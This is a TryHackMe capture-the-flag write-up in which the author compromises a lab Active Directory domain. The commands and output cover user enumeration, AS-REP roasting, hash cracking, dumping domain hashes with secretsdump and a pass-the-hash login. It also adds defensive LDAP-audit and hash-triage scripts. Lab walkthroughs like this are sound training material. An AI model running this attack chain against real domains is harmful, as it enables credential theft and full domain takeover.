TryHackMe - Attacktive Directory Write-up
https://tryhackme.com/r/room/attacktivedirectory
This write-up focuses on the overall solving methodology rather than going task by task.
Different tools are showcased for the same objective.
Enumeration
My target machine IP: 10.10.98.165
Check for domain name and naming contexts
First things first: an nmap scan.
nmap -n -sV --script "ldap* and not brute" 10.10.98.165 -vv -oN nmap.output
We've obtained the naming contexts and the domain name:

Alternative way to look for naming contexts:
root@ip-10-10-155-73:~# ldapsearch -H ldap://10.10.98.165 -x -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts
#
#
dn:
namingcontexts: DC=spookysec,DC=local
namingcontexts: CN=Configuration,DC=spookysec,DC=local
namingcontexts: CN=Schema,CN=Configuration,DC=spookysec,DC=local
namingcontexts: DC=DomainDnsZones,DC=spookysec,DC=local
namingcontexts: DC=ForestDnsZones,DC=spookysec,DC=local
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
Check NULL bind
The result shows that it is unsuccessful: a bind must be completed before a search is allowed.
root@ip-10-10-155-73:~# ldapsearch -H ldap://10.10.98.165 -x -b DC=spookysec,DC=local
# extended LDIF
#
# LDAPv3
# base <DC=spookysec,DC=local> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A69, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v4563
# numResponses: 1
root@ip-10-10-155-73:~#
Shares enumeration
The result shows that we're not allowed to view the shares anonymously, so we'll need some credentials.
root@ip-10-10-155-73:~# smbclient -L //10.10.98.165 -N
WARNING: The "syslog" option is deprecated
Anonymous login successful
Sharename Type Comment
--------- ---- -------
smb1cli_req_writev_submit: called for dialect[SMB3_11] server[10.10.98.165]
Error returning browse list: NT_STATUS_REVISION_MISMATCH
Reconnecting with SMB1 for workgroup listing.
Connection to 10.10.98.165 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Failed to connect with SMB1 -- no workgroup available
User enumeration
Mini wordlists are provided by the author to save us some time.
Username wordlist: https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/userlist.txt
Password wordlist: https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/passwordlist.txt
The tools that can be used are kerbrute and ldapsearch.
To install Kerbrute:
$ wget https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64
$ chmod +x kerbrute_linux_amd64
# add to PATH
$ sudo mv kerbrute_linux_amd64 /usr/local/bin/kerbrute
# test installation
$ kerbrute
Using the wordlists provided, we can run kerbrute to get some usernames:
root@ip-10-10-155-73:~# kerbrute userenum -d spookysec.local --dc 10.10.98.165 userlist.txt -o valid_users
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 09/22/24 - Ronnie Flathers @ropnop
2024/09/22 06:59:11 > Using KDC(s):
2024/09/22 06:59:11 > 10.10.98.165:88
2024/09/22 06:59:11 > [+] VALID USERNAME: [email protected]
2024/09/22 06:59:12 > [+] VALID USERNAME: [email protected]
2024/09/22 06:59:12 > [+] VALID USERNAME: [email protected]
2024/09/22 06:59:12 > [+] VALID USERNAME: [email protected]
2024/09/22 06:59:13 > [+] VALID USERNAME: [email protected]
2024/09/22 06:59:13 > [+] VALID USERNAME: [email protected]
2024/09/22 06:59:14 > [+] VALID USERNAME: [email protected]
2024/09/22 06:59:15 > [+] VALID USERNAME: [email protected]
2024/09/22 06:59:18 > [+] VALID USERNAME: [email protected]
2024/09/22 06:59:19 > [+] VALID USERNAME: [email protected]
2024/09/22 06:59:24 > [+] VALID USERNAME: [email protected]
2024/09/22 06:59:36 > [+] VALID USERNAME: [email protected]
2024/09/22 06:59:40 > [+] VALID USERNAME: [email protected]
2024/09/22 06:59:52 > [+] VALID USERNAME: [email protected]
2024/09/22 06:59:56 > [+] VALID USERNAME: [email protected]
2024/09/22 07:00:03 > [+] VALID USERNAME: [email protected]
2024/09/22 07:00:20 > Done! Tested 73317 usernames (16 valid) in 68.499 seconds
Some notable accounts are svc-admin (service admin) and backup.
Alternatively, ldapsearch can be run, but since we were not able to perform a NULL bind, this method returns no results.
root@ip-10-10-155-73:~# ldapsearch -H ldap://10.10.98.165 -x -b DC=spookysec,DC=local "(objectClass=person)" | grep "sAMAccountName:"
root@ip-10-10-155-73:~#
More information
We can get more info with enum4linux:
enum4linux 10.10.98.165
This tool helps us gather loads of information in an automated and easier manner.
Initial Foothold
Get password hash
Now that we have some usernames in hand, we can try an AS-REP Roasting attack. The tool sends an authentication request (AS-REQ) for each user account and identifies the ones that don't require Kerberos pre-authentication.
If successful, we get back a Kerberos AS-REP carrying the TGT, with an encrypted part derived from the user's password hash. We can then extract that hash and crack it offline.
The hint in the earlier tasks told us that svc-admin might be interesting, so let's pass that account to our tool. Just press "Enter" without typing anything when asked for a password.
root@ip-10-10-155-73:~# GetNPUsers.py spookysec.local/svc-admin -dc-ip 10.10.98.165 -request
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra
Password:
[*] Cannot authenticate svc-admin, getting its TGT
[email protected]:d23bacacc84229635907800006f7a958$9438e69f81aa21beae77b329a7532492e8bec1709388a8ad4d16e99f22be9d3f574756d4536d612178169ad3bee4748b8cee9b7e419b6301a8b6caa3617135c421d099440d568d8fb369701e87f88d1ac33b08eea54231dd9b62d27ad9d354e3a24ebfeb528c7b15bee5c2a1b07e7f7dd3ce710f0dde0fe1b11f3a4c45c82e262e3d285ec9f77b4734354d721fdd4643653cd228f32af335899701fb7c30097488f0f34c79ab7fa3a972f42d20b5a2b9f59425e1da9801e3b50d3ff2df90ace6269087c57d9ef821895b7be7e80d2eb67c5c9534de23a4a2be06549bbe12b7c36310d632de316ae6fd37baa0dfdf646f6563
Hooray! The ticket is returned along with the hash.
I'll put it into a text file called svc-admin.hash.
root@ip-10-10-155-73:~# cat svc-admin.hash
[email protected]:d23bacacc84229635907800006f7a958$9438e69f81aa21beae77b329a7532492e8bec1709388a8ad4d16e99f22be9d3f574756d4536d612178169ad3bee4748b8cee9b7e419b6301a8b6caa3617135c421d099440d568d8fb369701e87f88d1ac33b08eea54231dd9b62d27ad9d354e3a24ebfeb528c7b15bee5c2a1b07e7f7dd3ce710f0dde0fe1b11f3a4c45c82e262e3d285ec9f77b4734354d721fdd4643653cd228f32af335899701fb7c30097488f0f34c79ab7fa3a972f42d20b5a2b9f59425e1da9801e3b50d3ff2df90ace6269087c57d9ef821895b7be7e80d2eb67c5c9534de23a4a2be06549bbe12b7c36310d632de316ae6fd37baa0dfdf646f6563
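What GetNPUsers is really testing, as an added example that is not from the write-up or from Impacket: the DONT_REQ_PREAUTH bit of userAccountControl is what makes an account roastable, and the same bit is what a defender audits and clears. The LDAP filter and the UAC bit values are real; the sample entries and their account names are constructed.

```python
# Added example (not from the write-up or Impacket): audit the AD attribute
# behind AS-REP roasting. Sample entries below are constructed.
from typing import Iterable

# userAccountControl bit flags (values from the Windows UAC documentation)
ACCOUNTDISABLE = 0x0002
NORMAL_ACCOUNT = 0x0200
DONT_REQUIRE_PREAUTH = 0x400000  # "Do not require Kerberos preauthentication"

# Server-side filter: 1.2.840.113556.1.4.803 is LDAP_MATCHING_RULE_BIT_AND,
# so this matches objects whose userAccountControl has the pre-auth bit set.
ASREP_ROASTABLE_FILTER = (
    "(&(objectClass=user)"
    f"(userAccountControl:1.2.840.113556.1.4.803:={DONT_REQUIRE_PREAUTH}))"
)


def asrep_roastable(entries: Iterable[dict]) -> list[str]:
    """Return sAMAccountNames that answer an AS-REQ without pre-authentication.

    Each entry is a dict with 'sAMAccountName' and 'userAccountControl', as
    ldapsearch would return them. Disabled accounts are skipped: the KDC
    issues nothing for them, so the flag is harmless until they are enabled.
    """
    found = []
    for e in entries:
        uac = int(e["userAccountControl"])
        if uac & DONT_REQUIRE_PREAUTH and not uac & ACCOUNTDISABLE:
            found.append(e["sAMAccountName"])
    return found


def remediated_uac(uac: int) -> int:
    """The fix: clear the bit (Set-ADAccountControl -DoesNotRequirePreAuth $false)."""
    return uac & ~DONT_REQUIRE_PREAUTH


# Constructed sample: a normal user, a roastable service account and a
# roastable-but-disabled account (hypothetical names, not from spookysec.local).
SAMPLE_ENTRIES = [
    {"sAMAccountName": "alice", "userAccountControl": NORMAL_ACCOUNT},
    {"sAMAccountName": "svc-legacy",
     "userAccountControl": NORMAL_ACCOUNT | DONT_REQUIRE_PREAUTH},
    {"sAMAccountName": "old-svc",
     "userAccountControl": NORMAL_ACCOUNT | DONT_REQUIRE_PREAUTH | ACCOUNTDISABLE},
]

if __name__ == "__main__":
    print("LDAP filter:", ASREP_ROASTABLE_FILTER)
    print("Roastable accounts:", asrep_roastable(SAMPLE_ENTRIES))
```

Running the filter with an authenticated bind against the domain gives the same list GetNPUsers would find, which is why clearing the flag (or moving such accounts to a long random password) is the fix.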
Cracking the hash
Here's a useful link to find out what type of hash we obtained: hashcat wiki
The hash prefix tells us that the mode we need is 18200 (Kerberos 5 AS-REP, etype 23):

Remember the password list provided by the author earlier? We'll use that.
root@ip-10-10-155-73:~# hashcat -m 18200 svc-admin.hash passwordlist.txt
hashcat (v6.1.1-66-g6a419d06) starting...
* Device #2: Outdated POCL OpenCL driver detected!
This OpenCL driver has been marked as likely to fail kernel compilation or to produce false negatives.
You can use --force to override this, but do not report related errors.
OpenCL API (OpenCL 1.2 LINUX) - Platform #1 [Intel(R) Corporation]
==================================================================
* Device #1: AMD EPYC 7571, 3832/3896 MB (974 MB allocatable), 2MCU
OpenCL API (OpenCL 1.2 pocl 1.1 None+Asserts, LLVM 6.0.0, SPIR, SLEEF, DISTRO, POCL_DEBUG) - Platform #2 [The pocl project]
===========================================================================================================================
* Device #2: pthread-AMD EPYC 7571, skipped
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Applicable optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
Host memory required for this attack: 35 MB
Dictionary cache built:
* Filename..: passwordlist.txt
* Passwords.: 70188
* Bytes.....: 569236
* Keyspace..: 70188
* Runtime...: 0 secs
[email protected]:d23bacacc84229635907800006f7a958$9438e69f81aa21beae77b329a7532492e8bec1709388a8ad4d16e99f22be9d3f574756d4536d612178169ad3bee4748b8cee9b7e419b6301a8b6caa3617135c421d099440d568d8fb369701e87f88d1ac33b08eea54231dd9b62d27ad9d354e3a24ebfeb528c7b15bee5c2a1b07e7f7dd3ce710f0dde0fe1b11f3a4c45c82e262e3d285ec9f77b4734354d721fdd4643653cd228f32af335899701fb7c30097488f0f34c79ab7fa3a972f42d20b5a2b9f59425e1da9801e3b50d3ff2df90ace6269087c57d9ef821895b7be7e80d2eb67c5c9534de23a4a2be06549bbe12b7c36310d632de316ae6fd37baa0dfdf646f6563:management2005
Session..........: hashcat
Status...........: Cracked
Hash.Name........: Kerberos 5, etype 23, AS-REP
Hash.Target......: [email protected]:d23bacacc84...6f6563
Time.Started.....: Sun Sep 22 07:32:20 2024 (0 secs)
Time.Estimated...: Sun Sep 22 07:32:20 2024 (0 secs)
Guess.Base.......: File (passwordlist.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 578.5 kH/s (13.26ms) @ Accel:64 Loops:1 Thr:64 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 8192/70188 (11.67%)
Rejected.........: 0/8192 (0.00%)
Restore.Point....: 0/70188 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: m123456 -> whitey
Started: Sun Sep 22 07:31:59 2024
Stopped: Sun Sep 22 07:32:21 2024
root@ip-10-10-155-73:~#
Password for svc-admin is management2005.
Looking into shares
This time we have valid credentials to log in to the share.
root@ip-10-10-155-73:~# smbclient -L //10.10.98.165 -U svc-admin%management2005
WARNING: The "syslog" option is deprecated
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
backup Disk
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
Connection to 10.10.98.165 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Failed to connect with SMB1 -- no workgroup available
For easier enumeration of the share, we'll switch to smbmap.
To install: sudo pip3 install smbmap
We've obtained a username called backup earlier, so it makes sense for us to have a look at the backup share first.
root@ip-10-10-155-73:~# smbmap -H 10.10.98.165 -u svc-admin -p management2005 -r backup
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.4 | Shawn Evans - [email protected]
https://github.com/ShawnDEvans/smbmap
[\] Checking for open ports... [*] Detected 1 hosts serving SMB
[|] Authenticating... [*] Established 1 SMB connections(s) and 1 authenticated session(s)
[/] Enumerating shares... [-] Enumerating shares... [\] Enumerating shares... [|] Enumerating shares... [/] Enumerating shares... [-] Enumerating shares...
[+] IP: 10.10.98.165:445 Name: ip-10-10-98-165.eu-west-1.compute.internal Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
backup READ ONLY
./backup
dr--r--r-- 0 Sat Apr 4 20:08:39 2020 .
dr--r--r-- 0 Sat Apr 4 20:08:39 2020 ..
fr--r--r-- 48 Sat Apr 4 20:08:53 2020 backup_credentials.txt
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
[\] Closing connections.. [|] Closing connections.. [/] Closing connections.. [-] Closing connections.. [\] Closing connections.. [|] Closing connections.. [/] Closing connections.. [-] Closing connections.. [*] Closed 1 connections
root@ip-10-10-155-73:~#
The recursive listing reveals a credential text file.
Log in to the share and retrieve the file.
root@ip-10-10-155-73:~# smbclient //10.10.98.165/backup -U svc-admin
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\svc-admin's password:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sat Apr 4 20:08:39 2020
.. D 0 Sat Apr 4 20:08:39 2020
backup_credentials.txt A 48 Sat Apr 4 20:08:53 2020
8247551 blocks of size 4096. 3664666 blocks available
smb: \> get backup_credentials.txt
getting file \backup_credentials.txt of size 48 as backup_credentials.txt (5.9 KiloBytes/sec) (average 5.9 KiloBytes/sec)
smb: \> exit
root@ip-10-10-155-73:~# cat backup_credentials.txt
YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw
I wasn't quite sure what encoding was used, so I dumped it into CyberChef, and the magic wand appeared.

Clicking the wand tells us that it's base64 encoded.

Boom! It's the credential for user account backup: [email protected]:backup2517860
Alternative way to decode the base64 string:
root@ip-10-10-155-73:~# cat backup_credentials.txt | base64 -d
[email protected]:backup2517860
Privilege Escalation
Get admin credentials
As mentioned by the author:
A backup account has a unique permission that allows all Active Directory changes to be synced with this user account. This includes password hashes.
Hmm, this means that the backup account can replicate, and therefore dump, every password hash in the domain.
root@ip-10-10-155-73:~# secretsdump.py -outputfile secresdump.output -just-dc-ntlm spookysec.local/backup:[email protected]
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\james:1105:aad3b435b51404eeaad3b435b51404ee:9448bf6aba63d154eb0c665071067b6b:::
spookysec.local\optional:1106:aad3b435b51404eeaad3b435b51404ee:436007d1c1550eaf41803f1272656c9e:::
spookysec.local\sherlocksec:1107:aad3b435b51404eeaad3b435b51404ee:b09d48380e99e9965416f0d7096b703b:::
spookysec.local\darkstar:1108:aad3b435b51404eeaad3b435b51404ee:cfd70af882d53d758a1612af78a646b7:::
spookysec.local\Ori:1109:aad3b435b51404eeaad3b435b51404ee:c930ba49f999305d9c00a8745433d62a:::
spookysec.local\robin:1110:aad3b435b51404eeaad3b435b51404ee:642744a46b9d4f6dff8942d23626e5bb:::
spookysec.local\paradox:1111:aad3b435b51404eeaad3b435b51404ee:048052193cfa6ea46b5a302319c0cff2:::
spookysec.local\Muirland:1112:aad3b435b51404eeaad3b435b51404ee:3db8b1419ae75a418b3aa12b8c0fb705:::
spookysec.local\horshark:1113:aad3b435b51404eeaad3b435b51404ee:41317db6bd1fb8c21c2fd2b675238664:::
spookysec.local\svc-admin:1114:aad3b435b51404eeaad3b435b51404ee:fc0f1e5359e372aa1f69147375ba6809:::
spookysec.local\backup:1118:aad3b435b51404eeaad3b435b51404ee:19741bde08e135f4b40f1ca9aab45538:::
spookysec.local\a-spooks:1601:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
ATTACKTIVEDIREC$:1000:aad3b435b51404eeaad3b435b51404ee:7d4c1da7336435b8961a5840a7de68d7:::
[*] Cleaning up...
Ahhh, look what we've got: the Administrator's hash.
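The same dump read the way a defender would, as an added example that is not part of the write-up or of Impacket: a small triage pass over secretsdump's "domain\uid:rid:lmhash:nthash:::" lines that spots password reuse, blank passwords and stored LM hashes. The sample is a subset of the output above, so the findings are about the room's own accounts.

```python
# Added example (not from the write-up or Impacket): triage an NTDS extract.
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of "" (LM not stored)
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of an empty password

# Subset of the secretsdump output above, plus status lines to show they are skipped.
SAMPLE_DUMP = r"""[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\svc-admin:1114:aad3b435b51404eeaad3b435b51404ee:fc0f1e5359e372aa1f69147375ba6809:::
spookysec.local\a-spooks:1601:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
ATTACKTIVEDIREC$:1000:aad3b435b51404eeaad3b435b51404ee:7d4c1da7336435b8961a5840a7de68d7:::
[*] Cleaning up..."""


def parse_dump(text: str) -> list[dict]:
    """Parse 'domain\\uid:rid:lmhash:nthash:::' lines; anything else is ignored."""
    rows = []
    for line in text.splitlines():
        if not line.endswith(":::"):
            continue
        account, rid, lm, nt = line[:-3].split(":")
        rows.append({"user": account.split("\\")[-1], "rid": int(rid),
                     "lm": lm.lower(), "nt": nt.lower()})
    return rows


def triage(rows: list[dict]) -> dict:
    """Findings a defender wants from a dump: reuse, blanks, LM, admin-hash reuse."""
    by_nt = defaultdict(list)
    for r in rows:
        by_nt[r["nt"]].append(r["user"])
    admin_nt = next(r["nt"] for r in rows if r["rid"] == 500)  # built-in Administrator
    return {
        # NT hashes are unsalted, so identical hashes mean identical passwords
        "shared_passwords": {h: u for h, u in by_nt.items() if len(u) > 1},
        "blank_passwords": by_nt.get(EMPTY_NT, []),
        "lm_hashes_stored": [r["user"] for r in rows if r["lm"] != EMPTY_LM],
        # any other account carrying the Administrator's hash is a second admin login
        "admin_hash_reused_by": [u for u in by_nt[admin_nt] if u != "Administrator"],
    }


if __name__ == "__main__":
    for finding, value in triage(parse_dump(SAMPLE_DUMP)).items():
        print(f"{finding}: {value}")
```

On this dump it reports that a-spooks shares the Administrator's password and that skidy and breakerofthings share one too; that is exactly why the room's a-spooks account would be as dangerous to lose as the Administrator itself.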
Pass the hash
Now we can perform a pass-the-hash attack with the NTLM hash.
root@ip-10-10-155-73:~# evil-winrm -i 10.10.98.165 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc
Evil-WinRM shell v2.4
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
thm-ad\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents>
Successful login!
Flags
Time to retrieve the flags from each user's Desktop.
Administrator:
*Evil-WinRM* PS C:\Users> ls
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/17/2020 4:04 PM a-spooks
d----- 9/17/2020 4:02 PM Administrator
d----- 4/4/2020 12:19 PM backup
d----- 4/4/2020 1:07 PM backup.THM-AD
d-r--- 4/4/2020 11:19 AM Public
d----- 4/4/2020 12:18 PM svc-admin
*Evil-WinRM* PS C:\Users> ls Administrator/Desktop
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/4/2020 11:39 AM 32 root.txt
*Evil-WinRM* PS C:\Users> cat Administrator/Desktop/root.txt
TryHackMe{4ctiveD1rectoryM4st3r}
*Evil-WinRM* PS C:\Users>
svc-admin:
*Evil-WinRM* PS C:\Users> ls svc-admin/Desktop
Directory: C:\Users\svc-admin\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/4/2020 12:18 PM 28 user.txt.txt
*Evil-WinRM* PS C:\Users> cat svc-admin/Desktop/user.txt.txt
TryHackMe{K3rb3r0s_Pr3_4uth}
*Evil-WinRM* PS C:\Users>
backup:
*Evil-WinRM* PS C:\Users> ls backup/Desktop
Directory: C:\Users\backup\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/4/2020 12:19 PM 26 PrivEsc.txt
*Evil-WinRM* PS C:\Users> cat backup/Desktop/PrivEsc.txt
TryHackMe{B4ckM3UpSc0tty!}
*Evil-WinRM* PS C:\Users>
That's it, hope you enjoyed :)